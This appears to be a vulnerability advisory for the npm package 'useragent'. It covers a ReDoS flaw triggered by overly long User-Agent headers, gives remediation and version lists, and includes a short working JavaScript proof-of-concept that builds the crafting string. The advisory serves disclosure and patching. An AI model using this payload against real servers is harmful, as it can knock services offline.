useragent

ReDoS via long UserAgent header

Severity: high

Overview

Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.

Proof of Concept

var useragent = require('useragent');

var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));

Remediation

Update to version 2.1.13 or later.

Vulnerable versions

0.1.0
8 years ago
0.1.1
8 years ago
0.1.2
7 years ago
1.0.0
7 years ago
1.0.1
7 years ago
1.0.2
7 years ago
1.0.3
7 years ago
1.0.4
7 years ago
1.0.5
7 years ago
1.0.6
6 years ago
1.1.0
6 years ago
2.0.0
6 years ago
2.0.1
6 years ago
2.0.2
5 years ago
2.0.3
5 years ago
2.0.4
5 years ago
2.0.5
5 years ago
2.0.6
5 years ago
2.0.7
5 years ago
2.0.8
4 years ago
2.0.9
4 years ago
2.0.10
4 years ago
2.1.0
4 years ago
2.1.1
4 years ago
2.1.2
4 years ago
2.1.3
4 years ago
2.1.4
4 years ago
2.1.5
4 years ago
2.1.6
3 years ago
2.1.7
3 years ago
2.1.8
3 years ago
2.1.9
2 years ago
2.1.10
2 years ago
2.1.11
2 years ago
2.1.12
2 years ago

Unaffected versions

2.1.13
a year ago
2.2.0
a year ago
2.2.1
a year ago
2.3.0
7 months ago

Advisory timeline

  1. Published

    Advisory published
    Apr 14th, 2017
  2. Reported

    Initial report by Mathias Madsen
    Feb 9th, 2017